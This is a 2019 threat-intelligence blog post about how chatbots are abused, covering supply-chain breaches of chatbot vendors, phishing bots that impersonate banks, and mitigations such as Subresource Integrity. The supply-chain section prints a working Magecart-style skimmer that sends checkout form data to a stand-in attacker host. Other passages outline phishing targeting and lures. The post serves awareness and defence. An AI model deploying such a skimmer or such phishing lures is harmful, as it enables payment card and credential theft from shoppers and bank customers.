Wednesday 29th May 2019

Hasta la Visa, baby: chatbots gone rogue

By Jamie MacColl

In this blogpost, we unpack the cyber threats associated with a key emerging technology: the chatbot. A chatbot is a program that interacts with people via an instant messaging or audio interface, typically for customer service purposes. While chatbots are expected to bring huge benefits, businesses should be aware of their appeal to cybercriminals: chatbots have already proven to be a weak link in the supply chain, and they can be leveraged in innovative phishing campaigns.

What is a chatbot?

A chatbot is a program that interacts with people via an instant messaging or audio interface. It is powered either by machine learning or, more frequently, by predefined rules. In short, some chatbots are smarter and more capable than others. A chatbot can take the form of a layer on top of a service – for instance, a customer service chatbot on a website; alternatively, it might be a gateway to a service – for example, a digital marketing chatbot on a social media messenger platform that tries to attract customers to a particular website or product. While the average chatbot has not quite reached the sophistication of HAL 9000 (of 2001: A Space Odyssey infamy), chatbots can drastically reduce the cost of providing customer service and allow for innovative means of attracting new customers.
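To make the distinction concrete, the sketch below shows the rules-driven approach in TypeScript. It is a minimal illustration of our own devising, not any particular vendor’s product: keyword rules map to canned replies, with a fallback when nothing matches.

    // A minimal rules-driven chatbot: keyword rules map to canned replies.
    // Real products layer natural-language understanding, session state and
    // hand-off to a human agent on top of this basic loop.
    interface Rule {
      keywords: string[];
      reply: string;
    }

    const rules: Rule[] = [
      { keywords: ["refund", "return"], reply: "I can help with refunds. What is your order number?" },
      { keywords: ["hours", "open"], reply: "We are open 9am to 5pm, Monday to Friday." },
    ];

    function respond(message: string): string {
      const text = message.toLowerCase();
      const match = rules.find((rule) => rule.keywords.some((k) => text.includes(k)));
      return match ? match.reply : "Sorry, I didn't catch that. Could you rephrase?";
    }

    console.log(respond("How do I get a refund?")); // prints the refund reply

A machine learning-powered chatbot replaces the hand-written rules with a trained model, but the request-and-reply loop is the same.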

Threats from the supply chain: compromising third-party customer service chatbots

If you have interacted with a customer service agent in recent years, there’s a high chance you were talking to a bot. Chatbots are increasingly an essential component of the online customer service experience: a 2017 Oracle survey suggests that 80% of organisations plan to use them by 2020.[1] Cybercriminals alert to new possibilities have noted this trend too. This year, Orpheus’ intelligence reporting has highlighted cybercriminals’ intent and capability to compromise third-party customer service chatbots as a means of stealing payment card data from large e-commerce sites.

In April, it emerged that cybercriminals had stolen personally identifiable information (PII) and financial data from hundreds of thousands of customers of Delta Air Lines and the US retailers Best Buy and Sears. All three companies revealed that the thefts stemmed from a compromised third-party customer service chatbot hosted by [24]7.ai.[2]

Two months later, Ticketmaster disclosed that it had suffered a similar breach of payment card data. A group using a technique known as Magecart had breached a third-party chatbot supplier, Inbenta, enabling it to inject a JavaScript digital skimmer into Ticketmaster’s payment pages.

In both incidents, targeting a third-party chatbot supplier allowed cybercriminals to steal a large volume of payment card data while bypassing the more sophisticated security measures we would expect to find at large e-commerce sites. In this sense, customer service chatbots represent another target for enterprising threat actors seeking to exploit organisations’ supply chains, and we anticipate use of this technique will grow in line with uptake of the technology.
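To illustrate the technique, the sketch below shows the general shape of a Magecart-style skimmer in TypeScript. It is purely illustrative and is not the code used against Ticketmaster; “attacker.example” is a placeholder domain. Once delivered via the compromised supplier’s script, it quietly copies checkout form fields to an attacker-controlled server while the payment page continues to work normally.

    // Illustrative sketch only - not the actual skimmer from these breaches.
    // Runs in the victim's browser after being delivered by a compromised
    // third-party script embedded on the payment page.
    document.addEventListener("submit", (event) => {
      const form = event.target as HTMLFormElement;
      const stolen = new URLSearchParams();
      for (const element of Array.from(form.elements)) {
        const input = element as HTMLInputElement;
        if (input.name && input.value) {
          stolen.append(input.name, input.value); // card number, CVV, name...
        }
      }
      // Fire-and-forget exfiltration; the genuine form submission proceeds
      // untouched, so the victim notices nothing.
      navigator.sendBeacon("https://attacker.example/collect", stolen);
    });

Because the malicious code arrives from a supplier the retailer already trusts, it inherits that trust and rarely trips conventional perimeter defences.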

Phishing chatbots

Looking ahead, chatbot technology also offers cybercriminals the opportunity to create more convincing phishing campaigns targeting individual victims’ credentials or PII. A chatbot able to respond to a variety of questions and prompts on an instant messenger platform will appear much more credible than the average phishing email. Chatbots might enable cybercriminals to distribute personalised phishing messages on a broad scale.

Security researchers have already documented chatbots mimicking individuals – fake profiles that usually include an avatar of an attractive woman – in campaigns directed against users of Tinder and Skype. From the phisher’s perspective, each conversation ideally ends with a love-struck individual providing their credentials or payment card details in the hope of a burgeoning relationship with the fake profile. Using chatbots helps cybercriminals carry out such campaigns on a much wider scale, as they do not need to manually operate each fake profile and respond to every message they receive.

We anticipate, however, that cybercriminals will also start impersonating companies’ chatbots built for social media messenger platforms. The graph below illustrates the increase in monthly active users (MAUs) on such apps. This is in part due to the increasing functionality of platforms like Facebook Messenger and WeChat – the latter has already integrated a variety of tools and third-party services to the extent that users can perform many of their daily tasks within the app.[4] This will present new opportunities for cybercriminal activity.

[Graph: growth in monthly active users of global messaging apps. Source: slide 22 of Kleiner Perkins’ ‘Internet Trends 2018’ presentation, https://www.slideshare.net/kleinerperkins]

A simulated phishing chatbot

As we have not seen a threat actor employ a phishing chatbot impersonating a brand in the wild, we have produced a demo video to show how one might work. We created the demo using an open-source tool that itself uses the Facebook Messenger platform. It is designed to mimic a fictional bank – “ABC Bank” – that has experienced months of IT failures and is seeking to improve its customer service. This scenario reflects both banks’ increasing use of chatbots for customer service and account management, and the cybercriminal tendency to deploy new TTPs (tactics, techniques and procedures) against financial institutions before other sectors.
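We are not reproducing the phishing dialogue here, but the plumbing beneath such a bot is trivial. The sketch below shows a minimal Messenger webhook in TypeScript, assuming an Express server, Node 18+ and a page access token from a Facebook developer account; the endpoint shape follows Facebook’s Messenger Platform, while the greeting text and API version are illustrative.

    // A minimal Messenger bot webhook: receive message events, reply via the
    // Send API. Assumes Node 18+ (built-in fetch) and a page access token
    // from a Facebook developer account; the greeting text is illustrative.
    import express from "express";

    const app = express();
    app.use(express.json());

    const PAGE_ACCESS_TOKEN = process.env.PAGE_ACCESS_TOKEN ?? "";

    app.post("/webhook", async (req, res) => {
      for (const entry of req.body.entry ?? []) {
        for (const event of entry.messaging ?? []) {
          if (event.message?.text) {
            await sendText(event.sender.id, "Welcome to ABC Bank support. How can we help today?");
          }
        }
      }
      res.sendStatus(200); // acknowledge promptly or Messenger will retry
    });

    async function sendText(recipientId: string, text: string): Promise<void> {
      await fetch(`https://graph.facebook.com/v3.2/me/messages?access_token=${PAGE_ACCESS_TOKEN}`, {
        method: "POST",
        headers: { "Content-Type": "application/json" },
        body: JSON.stringify({ recipient: { id: recipientId }, message: { text } }),
      });
    }

    app.listen(3000);

Wire a handful of rules like those sketched earlier into the reply logic and the half-hour build time we mention below is entirely plausible.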

Our ABC Bank demo phishing bot is designed to encourage victims to part with their banking credentials in return for free travel or phone insurance, offered as compensation for the bank’s recent IT problems. It attempts to gain victims’ trust through a conversational tone, links to legitimate ABC Bank pages (the “Read Full Details” button) and by playing on real-life events (the IT failures). A real version would end with a link to a credential phishing page, or might even try to harvest account details directly within the chat.

Our phishing bot could be distributed in a variety of ways, but the most effective currently available would be paid adverts containing a link to the chatbot, targeted specifically at users who like or have interacted with ABC Bank on Facebook. Facebook’s struggles with policing malicious adverts and phishing links have been well documented. Facebook’s Customer Matching tool, which provides additional functionality for anyone with a Facebook developer account, may enable cybercriminals to refine their targeting further, although the shelf life of such a campaign would be shorter given the greater prospect of detection. Alternatively, criminals could simply host chatbots on replica sites akin to those that host credential phishing pages, and redirect potential victims to them using phishing emails.

While our demo is unlikely to fool everyone, we believe it would snare enough victims to make a campaign worthwhile. Crucially, chatbots are still a novelty, meaning consumers are not used to interacting with brands in this way; this might explain why research indicates that click-through rates for chatbots are significantly higher than those for emails.[5] Although users are increasingly aware of the threat from phishing emails, public awareness of this new vector will be limited, increasing its likely effectiveness.

Furthermore, it is much easier to convincingly mimic the branding of a bank on Facebook Messenger than it is in a phishing email. Finally, the barriers to entry are low: we created the bot in less than half an hour, and a threat actor willing to invest more time and effort could likely produce a very convincing phishing bot.

What can companies do in response?

Chatbots like these are likely to be a threat both to individual consumers and to the reputations of brands that are unable to prevent their customers from becoming victims. However, these attack methods are not revolutionary and can be mitigated. Mitigation includes ensuring the security of your supply chain, avoiding embedding third-party scripts on payment pages and, above all, educating employees and consumers that phishing campaigns are innovative and not confined to email. As always, tried and tested security hygiene goes a long way towards mitigating this evolving threat.
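On the second of those mitigations: where a third-party script genuinely must be embedded, Subresource Integrity (SRI) provides a concrete control. The sketch below, in TypeScript, generates the integrity hash for a vetted copy of a supplier’s script (the local path and vendor URL are assumptions for illustration); pin the hash in the script tag and a tampered version of the file will simply refuse to load.

    // Generate a Subresource Integrity (SRI) hash for a vetted copy of a
    // third-party script. Browsers will refuse to execute the script if the
    // served file no longer matches this hash. File path and vendor URL are
    // illustrative assumptions.
    import { createHash } from "crypto";
    import { readFileSync } from "fs";

    const script = readFileSync("vendor/chatbot.js");
    const digest = createHash("sha384").update(script).digest("base64");

    console.log(
      `<script src="https://vendor.example/chatbot.js" ` +
        `integrity="sha384-${digest}" crossorigin="anonymous"></script>`,
    );

SRI does not remove the need to vet suppliers, but it turns a silent script swap of the kind seen in the Ticketmaster breach into a visible failure.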

Jamie MacColl is an Orpheus researcher.


[1] https://www.oracle.com/uk/corporate/pressrelease/oracle-report-can-virtual-experiences-replace-reality-vr-chatbots-for-cx-20161206.html

[2] https://threatpost.com/delta-sears-breaches-blamed-on-malware-attack-against-a-third-party-chat-service/131023/

[4] https://qz.com/1167024/all-the-things-you-can-and-cant-do-with-your-wechat-account-in-china/

[5] https://www.searchenginejournal.com/facebook-messenger-chatbot-success/242477/
